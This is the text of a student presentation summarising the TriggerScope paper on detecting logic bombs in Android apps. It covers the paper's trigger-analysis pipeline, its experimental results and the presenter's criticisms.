TriggerScope: Towards Detecting Logic Bombs in Android Applications [Fratantonio, Yanick, Antonio Bianchi, William Robertson, Engin Kirda, Christopher Kruegel, and Giovanni Vigna. "Triggerscope: Towards detecting logic bombs in android applications." In Security and Privacy (SP), 2016 I EEE Symposium on, pp. 377-396. I EEE, 2016.] Presented by Suzzie Yang Threats to applications • Malicious application logic • Violate the expectations of the users • Private sensitive data leakage eg. contextual information, GPS location, personal accounts • Sophisticated malware designs increase stealthiness and becomes difficult to prevent and detect What is logic bomb? • Functionalities with condition check statements • The malware is only activated under certain circumstances • May appear as a perfectly legitimate action • bypassing automatic analysis systems • Example: Navigation typed app • Time-related checks • Locations checks The attack is triggered under certain, narrow circumstances State-of-art analysis • Static analysis • Base on permission sets • Machine learning techniques • Dynamic analysis • Execution of data in real-time • Modifications on Android framework and native libraries • Main purpose is to analyse malware detection • The definition of the application’s specific purpose and “normal” functionality are lacking Proposed system: TriggerScope • Trigger analysis technique • Triggers are suspicious predicates (or checks) • Suspicious checks for very specific conditions • Focus on characterising the predicates • Less attention with the behaviour itself • Time, location and SMS related predicates Identify triggered malware through the identification of logic bombs Overview of trigger analysis (1) • Input: Android app Dalvik bytecode • Step 1: Symbolic execution • Records operations on relevant objects • Annotated with expression tree • Step 2: Predicate extraction • Backward traverse of control-flow graph (CFG) • Remove false dependencies • Recovers intra-procedural path predicates Overview of trigger analysis (2) • Step 3: Predicate characterisation • Appraise how suspicious/narrow a predicate is • Base on type of comparison performed • Step 4: Control dependencies • Checks whether a suspicious predicate guards and sensitive operation • Inter-procedural • Step 5: Post-filter • Filter out cases that match our definition of suspiciousness but that are clearly benign • Output: Suspicious apps or benign apps Experiment • Dataset • 9,582 benign apps: A mix of time, location and SMS related APIs • 14 malicious apps: Developed by DARPA red team and real-world malware • Result 35 out of 9,582 benign apps flagged suspicious Accuracy evaluation Each consecutive steps reduced the false positive rate to 0.38% Criticism 1. Seems like the author is only considering cases where predicates are checked against hard coded object values • The trigger may be invoked by other means such as over the network • Indirect modification of values at different circumstances 2. Since their focus is on triggers and not their behaviour, the paper adopts a lenient of flagging suspiciousness • Therefore contributing to the result of 0% false negative as almost the majority of the checks will be considered interesting as potential suspicious predicates. Thank you Questions?
© Copyright 2026 Paperzz